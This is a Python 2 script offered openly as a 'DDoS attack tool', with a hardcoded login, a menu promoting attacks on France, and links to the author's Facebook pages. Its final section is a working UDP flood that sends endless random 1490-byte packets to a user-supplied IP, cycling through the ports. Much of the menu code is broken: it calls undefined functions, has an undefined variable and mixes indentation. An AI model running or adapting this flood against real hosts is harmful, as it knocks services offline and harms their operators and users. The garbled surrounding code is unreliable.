#!/usr/bin/python2
#coding=utf-8
#Nurul Amin Mahfuj
#Ddos Attack Tool
#Supprt By Md Roky Khan 

import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
print """
 \033[1;96m ------------------------
 \033[1;32m < NURUL AMIN MAHFUJ >
 \033[1;96m ------------------------
\033[1;96m
  =====================================================
                    ASSALAMU ALAIKUM                    
             Coded By : Nurul Amin Mahfuj       
               Facebook : Nurul Amin Mahfuj                    
           Website : https://github.com/mahfuj420          
    ---------------    ---------------    ------------  
                    Kingz Tor Abbu [N.A.M]                  
  =====================================================
\033[1;94m------------------------------------+-----------------')
\033[1;95m _           _______     _______ ') 
\033[1;95m( (    /|   (  ___  )   (       )')
\033[1;95m|  \  ( |   | (   ) |   | () () |')
\033[1;95m|   \ | |   | (___) |   | || || |')
\033[1;92m| (\ \) |   |  ___  |   | |(_)| |')
\033[1;92m| | \   |   | (   ) |   | |   | |')
\033[1;92m| )  \  | _ | )   ( | _ | )   ( |')
\033[1;92m|/    )_)(_)|/     \|(_)|/     \|')
\033[1;95m------------------------------------+-----------------')"""

jalan('\033[1;40m---> \033[1;32mWelcome To France Er Hoga Marar Tools')
jalan('\033[1;40m---> \033[1;32mFrance Thapanor Jonno Banano')
jalan('\033[1;40m---> \033[1;32mAger I'd Zuckerer Meye Niya Geche')
jalan('\033[1;40m---> \033[1;32mKing Is Always King')
jalan('\033[1;40m---> \033[1;32mFrance Vagbe')

jalan('\033[1;94m---> \033[1;32m N.A.M Mahfuj \033[1;31m[ N.A.M ]')
print "\033[1;96m----->\033[1;32mTOOL LOGIN \033[1;96m<-----"

CorrectUsername = "N.A.M"
CorrectPassword = "Mahfuj"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;34mTool Username \x1b[1;31m---> \x1b[1;32m")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;34mTool Password \x1b[1;31m---> \x1b[1;32m")
        if (password == CorrectPassword):
            print "\033[1;32mACCESS GRANTED AS " + username #Dev:N.A.M Mahfuj 
	    time.sleep(2)
            loop = 'false'
        else:
            print "\033[1;31mACCESS DENIED"
            os.system('xdg-open https://www.facebook.com/abal.halara.vorba.voro.tomar.real.abbu.okays')
    else:
        print "\033[1;31mACCESS DENIED"
        os.system('xdg-open https://www.facebook.com/abal.halara.vorba.voro.tomar.real.abbu.okays')

def login():
	os.system('clear')
	try:
		toket = open('login.txt','r')
		menu() 
	except (KeyError,IOError):
		os.system('clear')
##### LICENSE #####
#=================#
def lisensi():
	os.system('clear')
	login()
####login#########
def login():
	os.system('clear')
	print logo
	jalan("\033[1;96m⊱⋕⊰══════════════════════════════════════⊱⋕⊰") 
	print "\033[1;91m>>>\033[1;91m[1]\033[1;93m Ddos Attack France  "
        time.sleep(0.05)
  print "\033[1;91m>>>\033[1;91m[2]\033[1;93m Request My Fb I'd "
	time.sleep(0.05)
	print "\033[1;91m>>>\033[1;91m[3]\033[1;94m Like My Official Page" 
	time.sleep(0.05)
	print "\033[1;91m>>>\033[1;91m[0]\033[1;96m Logout        "
	jalan("\033[1;96m⊱⋕⊰══════════════════════════════════════⊱⋕⊰") 
	pilih_login()

def pilih_login():
	peak = raw_input("\n\033[1;91mChoose an Option═╬══►\033[1;95m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_login()
	elif peak =="1":
		login1()
        elif peak =="2":
	        os.system('xdg-open https://www.facebook.com/abal.halara.vorba.voro.tomar.real.abbu.okays')
	        login()
	elif peak =="3":
		os.system('xdg-open https://www.facebook.com/kings.tor.abbu.kings.tor.real.abbu.mahfuj/')
		login()
	elif unikers =="0":
		jalan('Token Removed')
		os.system('rm -rf login.txt')
		keluar()
	else:
		print "\x1b[1;91mFill in correctly"
		pilih()
			
		
	
def login1():
	os.system('clear')
	try:
		toket = open('login.txt','r')
		menu() 
	except (KeyError,IOError):
		os.system('clear')
                time.sleep(0.05)
		print
os.system("figlet DDos Attack")
print
print "𝑊𝑒𝑙𝑐𝑜𝑚𝑒 𝑇𝑜 𝑁.𝐴.𝑀 𝑀𝑎ℎ𝑓𝑢𝑗"
print "𝐷𝑑𝑜𝑠 𝐴𝑡𝑡𝑎𝑐𝑘 𝐸𝑟 𝐶𝑜𝑚𝑎𝑛𝑑𝑒 𝐴𝑝𝑛𝑒𝑘𝑒 𝑆𝑎𝑔𝑜𝑡𝑜𝑚"
print "𝐴𝑔𝑒𝑟 𝐼𝑑 𝐻𝑜𝑔𝑎 𝑀𝑎𝑟𝑎 𝐾ℎ𝑎𝑖𝑦𝑎 𝑆𝑎𝑑ℎ𝑢 𝐻𝑜𝑖𝑦𝑎 𝐺𝑒𝑐ℎ𝑖"
print "𝐶𝑟𝑒𝑎𝑡𝑒𝑑      𝑁𝑢𝑟𝑢𝑙 𝐴𝑚𝑖𝑛 𝑀𝑎ℎ𝑓𝑢𝑗"
print
ip = raw_input("IP Target : ")
port = input("Port       : ")

os.system("clear")
os.system("figlet Attack Starting")
print "[                    ] 0% "
time.sleep(5)
print "[=====               ] 25%"
time.sleep(5)
print "[==========          ] 50%"
time.sleep(5)
print "[===============     ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     port = port + 1
     print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
     if port == 65534:
       port = 1
